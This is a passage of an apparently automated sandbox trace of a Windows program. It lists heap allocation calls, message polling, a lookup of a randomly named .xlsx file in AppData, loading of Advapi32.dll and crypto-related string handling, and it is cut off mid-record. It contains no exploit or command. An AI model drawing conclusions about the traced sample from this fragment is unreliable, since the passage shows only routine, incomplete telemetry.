0x2e50ea8 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0224.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0224.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0224.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.298] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0224.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0224.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50470 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0224.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0224.299] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/bbPMuZmaU.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6857e010, ftCreationTime.dwHighDateTime=0x1d5f05a, ftLastAccessTime.dwLowDateTime=0xc7b46ee0, ftLastAccessTime.dwHighDateTime=0x1d5efa9, ftLastWriteTime.dwLowDateTime=0xc7b46ee0, ftLastWriteTime.dwHighDateTime=0x1d5efa9, nFileSizeHigh=0x0, nFileSizeLow=0x14995, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="bbPMuZmaU.xlsx", cAlternateFileName="BBPMUZ~1.XLS")) returned 0xa87490 [0224.300] FindClose (in: hFindFile=0xa87490 | out: hFindFile=0xa87490) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50470 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0224.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.300] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.302] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0224.302] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.302] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0224.302] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0224.303] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.303] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0224.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0224.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0224.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0224.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0224.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0224.306] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0224.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04658 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04658 | out: hHeap=0x970000) returned 1 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0224.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0224.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0224.308] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0224.308] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0224.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0224.308] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0224.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0224.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0224.309] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0224.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f698 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0224.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0224.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0224.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0224.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.310] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0224.310] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0224.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0224.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0224.310] HeapFree (in: hHeap=0x970000, 